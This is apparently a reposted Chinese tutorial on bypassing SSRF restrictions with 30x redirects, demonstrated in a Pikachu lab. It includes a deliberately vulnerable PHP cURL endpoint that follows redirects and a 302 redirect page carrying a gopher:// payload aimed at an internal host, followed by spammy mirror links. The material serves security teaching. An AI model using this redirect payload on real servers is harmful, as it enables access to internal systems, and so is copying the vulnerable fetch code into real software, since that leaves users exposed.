当前位置: 首页 > wzjs >正文

pc端的网站设计方案网站展示重点

pc端的网站设计方案,网站展示重点,企业网站可以自己做吗,视觉设计专业学什么ssrf漏洞在厂商的处理下可能进行一些特殊处理导致我们无法直接利用漏洞 有以下四种: 1.ip地址限制绕过 2.域名限制绕过 3.30x跳转绕过域名限制 4.DNS rebinding绕过内网ip限制 本章我们讲30x跳转绕过域名限制 30x跳转绕过域名限制 之前我们使用ssrf漏洞时可以…

ssrf漏洞在厂商的处理下可能进行一些特殊处理导致我们无法直接利用漏洞

有以下四种:

1.ip地址限制绕过

2.域名限制绕过

3.30x跳转绕过域名限制

4.DNS rebinding绕过内网ip限制

本章我们讲30x跳转绕过域名限制

30x跳转绕过域名限制

       之前我们使用ssrf漏洞时可以利用各种协议进行访问,如file,gopher等等,如果厂商限制我们

只能使用http协议我们怎么进行绕过

我们可以利用30x跳转绕过域名限制

原理如下图所示:

用户请求                ->                        服务器                     ->                            目标
                                                          服务器                    <-              返回重定向到 NewTarget
                                                          服务器                     ->                        NewTarget

       SSRF 的本质就是服务器访问了目标,如果目标返回一个重定向,此时服务器如果支持跟随重

定向则再次访问新的目标,服务器在创建请求时可以设置是否跟随重定向,下面通过 php 代码演

示。

<?php
$ch=curl_init(); // 初始化一个 cURL 对象
$url=$_GET['url']; // 从 GET 请求中获取 URL 参数
curl_setopt($ch,CURLOPT_URL,$url); // 设置要访问的 URL
curl_setopt($ch,CURLOPT_HEADER,0); // 设置是否包含头部信息
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); // 设置是否返回输出,不直接输出到页面
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1); // 设置是否跟随跳转
$res=curl_exec($ch); // 执行 cURL 请求并获取返回结果
var_dump(curl_error($ch) ); // 打印 cURL 错误信息(如果有)
curl_close($ch); // 关闭 cURL 资源
echo $res; // 输出返回的结果
?>

以上 php 代码接收 URL 参数通过 curl 方法创建新的请求,并设置支持重定向。

那么我们就设置完成靶场跟随重定向。

下面我们创建一个302跳转平台:

kali 创建 302 跳转页面,通过 Location 返回 302 跳转,跳转使用 gopher 协议。

<?php
header("Location:gopher://192.168.112.12:80/_GET%20/pikachu-master/vul/ssrf/ssrf_info/info1.php%20HTTP/1.1%0D%0AHost%3A%20192.168.112.12%0D%0A");
?>

自己注意一下拼写不要直接复制粘贴。

我们去靶场尝试:

我们打开靶场:

url:http://192.168.112.12/ssrf.php

我们构造url:http://192.168.112.12/ssrf.php?url=http://192.168.112.12/302.php

         可以看到 ssrf.php 访问 302.php 成功根据 Location 加载 gopher 协议访问 info1.php,这使

得ssrf.php 如果对 url 参数采取白名单限制仅 HTTP 协议是无效的,到此我们就完成了绕过。

       302 跳转也可以通过短连接平台实现跳转,这里不对短连接平台进行测试,个别短连接平台会

对目标进行检测,选择哪个短连接平台亦或者自建平台自行测试。

注意:能否使用30x跳转技巧,取决于服务器功能点是否启用跟随跳转


文章转载自:

http://toMDonjM.rbkmL.cn
http://2b2K7B0e.rbkmL.cn
http://rKKd2a67.rbkmL.cn
http://L8eYDOzs.rbkmL.cn
http://sZ4pIaLb.rbkmL.cn
http://Fffxt8dc.rbkmL.cn
http://wbWqHI6v.rbkmL.cn
http://RuqiXmst.rbkmL.cn
http://BJ7rYtf7.rbkmL.cn
http://2n3SeVqJ.rbkmL.cn
http://oiH1I2ni.rbkmL.cn
http://BGwHHG0q.rbkmL.cn
http://sPCiNjFA.rbkmL.cn
http://AKoqd3ph.rbkmL.cn
http://js6W9EWb.rbkmL.cn
http://PRvxLcyy.rbkmL.cn
http://vmLnGLr5.rbkmL.cn
http://F8FlGwOG.rbkmL.cn
http://pAAa2sTD.rbkmL.cn
http://ANrMofA9.rbkmL.cn
http://7YCu2DtX.rbkmL.cn
http://DFfB2EmJ.rbkmL.cn
http://JtAXDTy6.rbkmL.cn
http://v55UqpX3.rbkmL.cn
http://XlHDQ6tu.rbkmL.cn
http://y6CCXUsd.rbkmL.cn
http://4LP2mJzz.rbkmL.cn
http://OfCD3W7C.rbkmL.cn
http://lAoWuvnp.rbkmL.cn
http://vz6D32ni.rbkmL.cn
http://www.dtcms.com/wzjs/727286.html

相关文章:

  • 网站开发公司深圳厦门微网站制作
  • 金融视频直播网站开发网站防恶意注册
  • 十堰网站建设哪家好出版社网站建设方案
  • 高校建设思政教育网站案例公司网站页脚
  • 电子商务网站的建设包含哪些流程图万网上传网站
  • 网站运营策划书邯郸有做网站的吗
  • 江安县建设招标网站网站优化 网站建设公司
  • wwr下载建设网站都江堰城乡建设局网站
  • 广州网站建设免费电商网站运营策划
  • 网站导航界面简单的网站制作
  • 如何做购物返佣金网站百度推广怎么做免费
  • 全球网站流量排名100服装网站建设需要什么内容
  • 天津平台网站建设企业东莞商城小程序制作
  • 如何建设物流网站写一份开网店策划书
  • html 购物网站网络营销成功案例有哪些
  • 北京哪家做网站和网络推广好的怎么做纪念网站
  • 最便宜网站空间四平网络推广公司
  • 互联网项目有哪些可做网站流量优化
  • 威海千淼网站建设重庆cms建站模板
  • 帝国网站后台编辑器没有了wordpress好用的插件推荐
  • 电商网站建设定制库尔勒市建设路街道办网站
  • 学做蛋糕哪个网站好大连建站模板厂家
  • thinkphp做网站蒙阴哪有做淘宝网站的
  • 做网站如何使用网页插件学校网站三合一建设方案
  • 网站建设推进计划做网站一共需要多少钱
  • 企业网站建设建设西安微信网站制作
  • 建网站哪家划算wordpress 自定义登录
  • 临沂建站公司商城app源码
  • 山东饰品行业网站开发在哪个网站上做苗木生意好些
  • 企业网站建设公司多米怎么建立网站?